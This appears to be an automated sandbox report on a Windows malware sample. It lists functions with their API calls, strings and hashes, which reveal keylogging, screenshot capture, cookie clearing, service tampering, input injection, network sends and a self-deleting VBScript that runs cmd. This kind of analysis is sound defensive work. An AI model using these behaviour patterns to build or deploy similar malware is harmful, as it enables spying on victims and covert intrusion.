                                          • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                                          • Opcode Fuzzy Hash: 5208e0e58cc42efc71676e40296c05a26964b477c59cb947b62b6e083ccbcc4a
                                          • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B488, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                            • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                            • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                            • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                                          • ExitProcess.KERNEL32 ref: 0040B64D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                          • API String ID: 1913171305-2411266221
                                          • Opcode ID: 471263eda05c6b116b6e8d9e67640a1fadfb8c4d9037e08d957ddcf25ab83b01
                                          • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                                          • Opcode Fuzzy Hash: 471263eda05c6b116b6e8d9e67640a1fadfb8c4d9037e08d957ddcf25ab83b01
                                          • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043558A, Relevance: 16.6, APIs: 11, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
                                          • GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
                                          • __dosmaperr.LIBCMT ref: 004355F6
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
                                          • GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
                                          • __dosmaperr.LIBCMT ref: 00435633
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
                                          • __dosmaperr.LIBCMT ref: 00435687
                                          • _free.LIBCMT ref: 00435693
                                          • _free.LIBCMT ref: 0043569A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 3975231651934d3df67afdbb7a717a2001fd2b5ecf708002a1789c5af24e8e78
                                          • Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
                                          • Opcode Fuzzy Hash: 3975231651934d3df67afdbb7a717a2001fd2b5ecf708002a1789c5af24e8e78
                                          • Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004053ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 0040540C
                                          • GetMessageA.USER32 ref: 004054BC
                                          • TranslateMessage.USER32(?), ref: 004054CB
                                          • DispatchMessageA.USER32 ref: 004054D6
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
                                          • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                                          • Opcode Fuzzy Hash: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
                                          • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416472, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                          • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                                          • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                                          • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00415938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041593D
                                          • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                            • Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                                            • Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
                                          • Sleep.KERNEL32(000003E8), ref: 00415A81
                                          • GetLocalTime.KERNEL32(?), ref: 00415A89
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                          • API String ID: 3280235481-3790400642
                                          • Opcode ID: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
                                          • Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
                                          • Opcode Fuzzy Hash: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
                                          • Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112sleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • Sleep.KERNEL32(00000064), ref: 00413700
                                          • DeleteFileW.KERNEL32(00000000), ref: 00413734
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 2701014334-2001430897
                                          • Opcode ID: 4ae9a0042fd3d898069abe8b57f97cd73655c9fb085f26b413844e457ee4bb3e
                                          • Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
                                          • Opcode Fuzzy Hash: 4ae9a0042fd3d898069abe8b57f97cd73655c9fb085f26b413844e457ee4bb3e
                                          • Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062D8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                                          • WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                                          • CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                          • CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063EF
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                          • String ID: .part$[Info]
                                          • API String ID: 820096542-3571004685
                                          • Opcode ID: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
                                          • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                                          • Opcode Fuzzy Hash: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
                                          • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
                                          • SetWindowsHookExA.USER32 ref: 004088BB
                                          • GetLastError.KERNEL32 ref: 004088C7
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • GetMessageA.USER32 ref: 00408915
                                          • TranslateMessage.USER32(?), ref: 00408924
                                          • DispatchMessageA.USER32 ref: 0040892F
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 004088DB
                                          • [ERROR], xrefs: 004088ED
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error $[ERROR]
                                          • API String ID: 3219506041-2451335947
                                          • Opcode ID: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                                          • Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
                                          • Opcode Fuzzy Hash: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
                                          • Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00446532, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 25a0fedeef60de312601f7e3a4da6be786f1c13d1c85f17154f2cc7462e416b2
                                          • Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
                                          • Opcode Fuzzy Hash: 25a0fedeef60de312601f7e3a4da6be786f1c13d1c85f17154f2cc7462e416b2
                                          • Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044E8D5, Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
                                          • __alloca_probe_16.LIBCMT ref: 0044EA3C
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
                                          • __alloca_probe_16.LIBCMT ref: 0044EAE6
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
                                          • __freea.LIBCMT ref: 0044EB55
                                          • __freea.LIBCMT ref: 0044EB61
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                                          • Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
                                          • Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                                          • Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043E9CE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • _memcmp.LIBVCRUNTIME ref: 0043EC78
                                          • _free.LIBCMT ref: 0043ECE9
                                          • _free.LIBCMT ref: 0043ED02
                                          • _free.LIBCMT ref: 0043ED34
                                          • _free.LIBCMT ref: 0043ED3D
                                          • _free.LIBCMT ref: 0043ED49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 277548da258104ed8908660a936750183da96d368650c7950346f8602d7075a1
                                          • Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
                                          • Opcode Fuzzy Hash: 277548da258104ed8908660a936750183da96d368650c7950346f8602d7075a1
                                          • Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004165DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00415D21,00000000), ref: 004165ED
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00415D21,00000000), ref: 00416601
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 0041660E
                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00415D21,00000000), ref: 00416643
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416655
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00415D21,00000000), ref: 00416658
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                          • String ID: !]A
                                          • API String ID: 493672254-3355486170
                                          • Opcode ID: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                                          • Instruction ID: 232e6080decb0fee5e9ead3af30a3f9a58c51749ff75a055db7eec232c54b811
                                          • Opcode Fuzzy Hash: 2da83694551842a269e36bbdcf3309e14e33c364ad340a3786a25d643810b493
                                          • Instruction Fuzzy Hash: 59016D311443253AD6114F3C9C4EEBF3B6CDB417B2F01032BF925922D2DA68CE4295AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041650F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415F36,00000000), ref: 0041651E
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415F36,00000000), ref: 00416532
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 0041653F
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00415F36,00000000), ref: 0041654E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416560
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415F36,00000000), ref: 00416563
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID: 6_A
                                          • API String ID: 221034970-3814682797
                                          • Opcode ID: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                                          • Instruction ID: da1897a772ed1359c9b05f965c8e3084c4a483461664f911434d7ad5a9b28404
                                          • Opcode Fuzzy Hash: 2c2b3b8fe19efe00be5a0416e4d3573a756b0db6844cffd145971c513e7c467f
                                          • Instruction Fuzzy Hash: 90F0C2715403187BD221AF65EC49DBF3B6CDB45B92F00002AFE0992196DA38CE4596E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004445EF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 00444649
                                          • __alloca_probe_16.LIBCMT ref: 00444681
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428E1A,?,?,?,00444840,00000001,00000001,?), ref: 004446CF
                                          • __alloca_probe_16.LIBCMT ref: 00444766
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004447C9
                                          • __freea.LIBCMT ref: 004447D6
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • __freea.LIBCMT ref: 004447DF
                                          • __freea.LIBCMT ref: 00444804
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                                          • Instruction ID: 38c3e806ad7a3790cd52a8b2f1174a250ebfd45b4bb0c692cfbb473d4bf5d511
                                          • Opcode Fuzzy Hash: 1ffa144e0095bbec8931e96d4ce059a1c473e9d7ef835e52d62b9c07a885e281
                                          • Instruction Fuzzy Hash: E951E3B2610216AFFB258F60CC41FAB77A9EB85754F15462BFC04D7240EB3CDC5186A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00415288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                                          • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                                          • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                                          • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend
                                          • String ID:
                                          • API String ID: 3431551938-0
                                          • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                          • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                                          • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                          • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                                            • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                                            • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                          • API String ID: 1133728706-4073444585
                                          • Opcode ID: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
                                          • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
                                          • Opcode Fuzzy Hash: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
                                          • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004501D3, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 340e5c6f313d110d6c329e306ddbe221ce309103c65e366733ffc241553d2b4b
                                          • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                                          • Opcode Fuzzy Hash: 340e5c6f313d110d6c329e306ddbe221ce309103c65e366733ffc241553d2b4b
                                          • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                                          Uniqueness

                                          Uniqueness Score: -1.00%

